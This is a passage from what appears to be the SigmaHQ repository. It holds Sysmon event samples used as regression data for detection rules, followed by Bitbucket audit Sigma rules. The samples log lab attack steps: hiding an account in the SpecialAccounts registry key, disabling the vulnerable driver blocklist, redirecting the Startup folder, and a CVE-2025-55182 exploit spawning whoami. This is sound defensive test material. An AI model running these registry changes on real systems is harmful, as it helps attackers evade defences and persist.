path: regression_data/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T23:59:35.308812Z"
}
},
"EventRecordID": 16567695,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-25 23:59:35.300",
"ProcessGuid": "5AA13A44-6465-68FD-EF3E-000000004002",
"ProcessId": 7500,
"Image": "C:\\Users\\Administrator\\Downloads\\PsService.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted",
"Details": "DWORD (0x00000001)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml
================================================
id: 070ba0e3-b1e5-4fa9-9935-ca8a8c233b3d
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 25ffa65d-76d8-4da5-a832-3f2b0136e133
title: PUA - Sysinternal Tool Execution - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-26T00:00:51.970813Z"
}
},
"EventRecordID": 16592206,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-26 00:00:51.957",
"ProcessGuid": "5AA13A44-64B2-68FD-FB3E-000000004002",
"ProcessId": 4776,
"Image": "C:\\Users\\Administrator\\Downloads\\FakeSysinternals.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted",
"Details": "DWORD (0x00000001)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml
================================================
id: a977324d-5006-46e6-bb1c-9d8b13344f00
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: f50f3c09-557d-492d-81db-9064a8d4e211
title: Suspicious Execution Of Renamed Sysinternals Tools - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-25T23:59:35.308812Z"
}
},
"EventRecordID": 16567695,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3308,
"ThreadID": 4008
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-25 23:59:35.300",
"ProcessGuid": "5AA13A44-6465-68FD-EF3E-000000004002",
"ProcessId": 7500,
"Image": "C:\\Users\\Administrator\\Downloads\\PsService.exe",
"TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted",
"Details": "DWORD (0x00000001)",
"User": "ATTACKRANGE\\Administrator"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml
================================================
id: 55e4036d-e026-4110-bf9a-a1037f28edbb
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d
title: PUA - Sysinternals Tools Execution - Registry
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-31T05:06:45.377630Z"
}
},
"EventRecordID": 657154,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3080,
"ThreadID": 4948
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "srv-01.midgardnet.tech",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-10-31 05:06:45.377",
"ProcessGuid": "14207D89-43E5-6904-4506-000000004002",
"ProcessId": 5244,
"Image": "C:\\Windows\\system32\\reg.exe",
"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\\AtomicOperator$",
"Details": "DWORD (0x00000000)",
"User": "MIDGARDNET\\SwachchhandaP"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/info.yml
================================================
id: 3c14b160-a7f5-49a4-beb2-575b70f599b9
description: N/A
date: 2025-10-31
author: SigmaHQ Team
rule_metadata:
- id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd
title: Hiding User Account Via SpecialAccounts Registry Key
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/9c226817-8dc9-46c2-a58d-66655aafd7dc.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2026-01-05T06:29:01.086253Z"
}
},
"EventRecordID": 74886,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3636,
"ThreadID": 4340
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2026-01-05 06:29:01.070",
"ProcessGuid": "0197231E-7211-694F-D001-000000000C00",
"ProcessId": 9524,
"Image": "C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Common Startup",
"Details": "C:\\Test\\calc.exe",
"User": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/info.yml
================================================
id: 0a756043-828b-47af-9863-3eeb6939c54d
description: N/A
date: 2026-01-05
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 9c226817-8dc9-46c2-a58d-66655aafd7dc
title: Modify User Shell Folders Startup Value
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_susp_user_shell_folders/9c226817-8dc9-46c2-a58d-66655aafd7dc.evtx
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/d526c60a-e236-4011-b165-831ffa52ab70.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 13,
"Version": 2,
"Level": 4,
"Task": 13,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-23T02:22:32.926365Z"
}
},
"EventRecordID": 90931,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3320,
"ThreadID": 4216
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"EventType": "SetValue",
"UtcTime": "2025-12-23 02:22:32.922",
"ProcessGuid": "0197231E-FCE8-6949-4010-000000000D00",
"ProcessId": 17728,
"Image": "C:\\WINDOWS\\system32\\reg.exe",
"TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\CI\\Config\\VulnerableDriverBlocklistEnable",
"Details": "DWORD (0x00000000)",
"User": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/info.yml
================================================
id: 329ecd6e-38a9-4bab-a75f-66854af61019
description: N/A
date: 2025-12-23
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: d526c60a-e236-4011-b165-831ffa52ab70
title: Windows Vulnerable Driver Blocklist Disabled
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/registry/registry_set/registry_set_vulnerable_driver_blocklist_disable/d526c60a-e236-4011-b165-831ffa52ab70.evtx
================================================
FILE: regression_data/rules/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 16,
"Version": 3,
"Level": 4,
"Task": 16,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-10-24T23:33:08.092105Z"
}
},
"EventRecordID": 11738,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 8932,
"ThreadID": 1540
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "ar-win-dc.attackrange.local",
"Security": {
"#attributes": {
"UserID": "S-1-5-21-3960063115-309473240-3247002503-500"
}
}
},
"EventData": {
"UtcTime": "2025-10-24 23:33:08.088",
"Configuration": "C:\\Users\\Administrator\\Downloads\\sysmonconfig-trace.xml",
"ConfigurationFileHash": "SHA256=B977839264146AFDE215D41182F78F153F9198EBA8EF0B88426239C33FBDA945"
}
}
}
================================================
FILE: regression_data/rules/windows/sysmon/sysmon_config_modification/info.yml
================================================
id: 54f3ccdd-e1f9-4b9f-8dda-b1bdcb13d6ba
description: N/A
date: 2025-10-24
author: SigmaHQ Team
rule_metadata:
- id: 8ac03a65-6c84-4116-acad-dc1558ff7a77
title: Sysmon Configuration Change
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
match_count: 1
path: regression_data/rules/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx
================================================
FILE: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/271de298-cc0e-4842-acd8-079a0a99ea65.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-12-06T21:11:02.649150Z"
}
},
"EventRecordID": 67583,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3904,
"ThreadID": 4272
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-12-06 21:11:02.632",
"ProcessGuid": "0197231E-9BE6-6934-5301-000000000B00",
"ProcessId": 3412,
"Image": "C:\\Windows\\System32\\cmd.exe",
"FileVersion": "10.0.26100.2454 (WinBuild.160101.0800)",
"Description": "Windows Command Processor",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "Cmd.Exe",
"CommandLine": "C:\\WINDOWS\\system32\\cmd.exe /d /s /c \"whoami\"",
"CurrentDirectory": "C:\\Users\\xodih\\Downloads\\CVE-2025-55182-main\\CVE-2025-55182-main\\test-server\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-99CA-6934-A8EB-010000000000",
"LogonId": "0x1eba8",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=352B525E9C26CB92693899528FE007C2,SHA256=1F1D918EC49E0B7C59B704FF412E1A6E224DA81C08CDA657E1CB482ABAAC146C,IMPHASH=94F3EFC2DF40ECD7229B904540DD83CF",
"ParentProcessGuid": "0197231E-9B6B-6934-2B01-000000000B00",
"ParentProcessId": 1092,
"ParentImage": "C:\\Users\\xodih\\AppData\\Local\\Temp\\bun-node-274e01c73\\node.exe",
"ParentCommandLine": "C:\\Users\\xodih\\AppData\\Local\\Temp\\bun-node-274e01c73\\node.exe C:\\Users\\xodih\\Downloads\\CVE-2025-55182-main\\CVE-2025-55182-main\\test-server\\node_modules\\next\\dist\\server\\lib\\start-server.js",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/info.yml
================================================
id: b6598f67-233f-4e7e-839d-2379a44fc63e
description: N/A
date: 2025-12-06
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 271de298-cc0e-4842-acd8-079a0a99ea65
title: Suspicious Child Process from Node.js Server - React2Shell
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules-emerging-threats/2025/Exploits/CVE-2025-55182/proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process/271de298-cc0e-4842-acd8-079a0a99ea65.evtx
================================================
FILE: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/af688c76-4ce4-4309-bfdd-e896f01acf27.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 1,
"Version": 5,
"Level": 4,
"Task": 1,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-11-26T05:11:27.927693Z"
}
},
"EventRecordID": 142649,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3544,
"ThreadID": 4264
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-11-26 05:11:27.908",
"ProcessGuid": "0197231E-8BFF-6926-1308-000000000D00",
"ProcessId": 10116,
"Image": "C:\\Users\\xodih\\Downloads\\GRB_NET.exe",
"FileVersion": "1.1.3.0",
"Description": "GRB_NT",
"Product": "GRB_NT",
"Company": "Zabbix",
"OriginalFileName": "GRB_NET.exe",
"CommandLine": "GRB_NET.exe -m:scan -i:f -d:list.txt",
"CurrentDirectory": "C:\\Users\\xodih\\Downloads\\",
"User": "swachchhanda\\xodih",
"LogonGuid": "0197231E-B736-6923-645E-3B0000000000",
"LogonId": "0x3b5e64",
"TerminalSessionId": 1,
"IntegrityLevel": "Medium",
"Hashes": "MD5=88DF27B6E794E3FD5F93F28B1CA1D3D0,SHA256=F8810179AB033A9B79CD7006C1A74FBCDE6ED0451C92FBB8C7CE15B52499353A,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",
"ParentProcessGuid": "0197231E-A1BD-6925-C705-000000000D00",
"ParentProcessId": 7972,
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
"ParentUser": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/info.yml
================================================
id: 78005a80-bbfd-475c-a4b2-f562a7b0fecf
description: N/A
date: 2025-11-27
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: af688c76-4ce4-4309-bfdd-e896f01acf27
title: Grixba Malware Reconnaissance Activity
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules-emerging-threats/2025/Malware/Grixba/proc_creation_win_malware_grixba_recon/af688c76-4ce4-4309-bfdd-e896f01acf27.evtx
================================================
FILE: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.json
================================================
{
"Event": {
"#attributes": {
"xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
},
"System": {
"Provider": {
"#attributes": {
"Name": "Microsoft-Windows-Sysmon",
"Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
}
},
"EventID": 7,
"Version": 3,
"Level": 4,
"Task": 7,
"Opcode": 0,
"Keywords": "0x8000000000000000",
"TimeCreated": {
"#attributes": {
"SystemTime": "2025-11-27T07:40:10.165324Z"
}
},
"EventRecordID": 571146,
"Correlation": null,
"Execution": {
"#attributes": {
"ProcessID": 3544,
"ThreadID": 4272
}
},
"Channel": "Microsoft-Windows-Sysmon/Operational",
"Computer": "swachchhanda",
"Security": {
"#attributes": {
"UserID": "S-1-5-18"
}
}
},
"EventData": {
"RuleName": "-",
"UtcTime": "2025-11-27 07:40:10.132",
"ProcessGuid": "0197231E-005A-6928-A50B-000000000D00",
"ProcessId": 4460,
"Image": "C:\\Windows\\System32\\WerFaultSecure.exe",
"ImageLoaded": "C:\\Windows\\System32\\dbgcore.dll",
"FileVersion": "10.0.26100.7019 (WinBuild.160101.0800)",
"Description": "Windows Core Debugging Helpers",
"Product": "Microsoft® Windows® Operating System",
"Company": "Microsoft Corporation",
"OriginalFileName": "DBGCORE.DLL",
"Hashes": "SHA1=5E4F2C531C549BB72A658ED9DD16D491EDDBB286,MD5=FAB4B30C1C4F0A9202A7B42DCF1729DC,SHA256=1B48A4F8D20026E6C56E3AB4CC4788FA6425C8A75F8D91C2869FA533DE6B209E,IMPHASH=C324AAAC01F0F75C811E1F80C41B860C",
"Signed": "true",
"Signature": "Microsoft Windows",
"SignatureStatus": "Valid",
"User": "swachchhanda\\xodih"
}
}
}
================================================
FILE: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/info.yml
================================================
id: 63b16abe-2d5c-4a2f-b0ae-f1bc4580e40c
description: N/A
date: 2025-11-27
author: Swachchhanda Shrawan Poudel (Nextron Systems)
rule_metadata:
- id: 8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b
title: WerFaultSecure Loading DbgCore or DbgHelp - EDR-Freeze
regression_tests_info:
- name: Positive Detection Test
type: evtx
provider: Microsoft-Windows-Sysmon
path: regression_data/rules-threat-hunting/windows/image_load/image_load_win_werfaultsecure_dbgcore_dbghelp_load/8a2f4b1c-3d5e-4f7a-9b2c-1e4f6d8a9c2b.evtx
================================================
FILE: rules/README.md
================================================
TBD
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml
================================================
title: Bitbucket Full Data Export Triggered
id: 195e1b9d-bfc2-4ffa-ab4e-35aef69815f8
status: test
description: Detects when full data export is attempted.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.collection
- attack.t1213.003
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Data pipeline'
auditType.action: 'Full data export triggered'
condition: selection
falsepositives:
- Legitimate user activity.
level: high
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml
================================================
title: Bitbucket Global Permission Changed
id: aac6c4f4-87c7-4961-96ac-c3fd3a42c310
status: test
description: Detects global permissions change activity.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1098
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Permissions'
auditType.action:
- 'Global permission remove request'
- 'Global permission removed'
- 'Global permission granted'
- 'Global permission requested'
condition: selection
falsepositives:
- Legitimate user activity.
level: medium
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml
================================================
title: Bitbucket Global Secret Scanning Rule Deleted
id: e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05
status: test
description: Detects Bitbucket global secret scanning rule deletion activity.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Basic" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Global administration'
auditType.action: 'Global secret scanning rule deleted'
condition: selection
falsepositives:
- Legitimate user activity.
level: medium
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml
================================================
title: Bitbucket Global SSH Settings Changed
id: 16ab6143-510a-44e2-a615-bdb80b8317fc
status: test
description: Detects Bitbucket global SSH access configuration changes.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.lateral-movement
- attack.defense-evasion
- attack.t1562.001
- attack.t1021.004
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Global administration'
auditType.action: 'SSH settings changed'
condition: selection
falsepositives:
- Legitimate user activity.
level: medium
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml
================================================
title: Bitbucket Audit Log Configuration Updated
id: 6aa12161-235a-4dfb-9c74-fe08df8d8da1
status: test
description: Detects changes to the bitbucket audit log configuration.
references:
- https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Basic" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Auditing'
auditType.action: 'Audit log configuration updated'
condition: selection
falsepositives:
- Legitimate user activity.
level: medium
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_project_secret_scanning_allowlist_added.yml
================================================
title: Bitbucket Project Secret Scanning Allowlist Added
id: 42ccce6d-7bd3-4930-95cd-e4d83fa94a30
status: test
description: Detects when a secret scanning allowlist rule is added for projects.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Basic" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Projects'
auditType.action: 'Project secret scanning allowlist rule added'
condition: selection
falsepositives:
- Legitimate user activity.
level: low
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml
================================================
title: Bitbucket Secret Scanning Exempt Repository Added
id: b91e8d5e-0033-44fe-973f-b730316f23a1
status: test
description: Detects when a repository is exempted from secret scanning feature.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Basic" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Repositories'
auditType.action: 'Secret scanning exempt repository added'
condition: selection
falsepositives:
- Legitimate user activity.
level: high
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml
================================================
title: Bitbucket Secret Scanning Rule Deleted
id: ff91e3f0-ad15-459f-9a85-1556390c138d
status: test
description: Detects when secret scanning rule is deleted for the project or repository.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
- https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.defense-evasion
- attack.t1562.001
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Basic" log level is required to receive these audit events.'
detection:
selection:
auditType.category:
- 'Projects'
- 'Repositories'
auditType.action:
- 'Project secret scanning rule deleted'
- 'Repository secret scanning rule deleted'
condition: selection
falsepositives:
- Legitimate user activity.
level: low
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml
================================================
title: Bitbucket Unauthorized Access To A Resource
id: 7215374a-de4f-4b33-8ba5-70804c9251d3
status: test
description: Detects unauthorized access attempts to a resource.
references:
- https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html
author: Muhammad Faisal (@faisalusuf)
date: 2024-02-25
tags:
- attack.resource-development
- attack.t1586
logsource:
product: bitbucket
service: audit
definition: 'Requirements: "Advance" log level is required to receive these audit events.'
detection:
selection:
auditType.category: 'Security'
auditType.action: 'Unauthorized access to a resource'
condition: selection
falsepositives:
- Access attempts to non-existent repositories or due to outdated plugins. Usually "Anonymous" user is reported in the "author.name" field in most cases.
level: critical
================================================
FILE: rules/application/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml
================================================
title: Bitbucket Unauthorized Full Data Export Triggered
